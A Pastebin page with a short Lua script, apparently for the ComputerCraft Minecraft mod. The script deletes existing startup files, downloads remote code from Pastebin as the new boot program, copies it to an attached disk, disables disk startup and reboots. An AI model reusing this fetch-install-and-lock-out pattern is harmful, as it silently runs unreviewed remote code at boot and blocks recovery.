Advertisement
therealinsight

Untitled

May 14th, 2016
128
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.32 KB | None | 0 0
  1. if fs.exists("/startup") == true then
  2.     shell.run("rm /startup")
  3. end
  4. if fs.exists("/disk/startup") == true then
  5.     shell.run("rm /disk/startup")
  6. end
  7.  
  8. shell.run("pastebin get cdYr6QvV startup")
  9. shell.run("cp /startup /disk/startup")
  10. settings.set("shell.allow_disk_startup","false")
  11. settings.save("/.settings")
  12. os.reboot()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement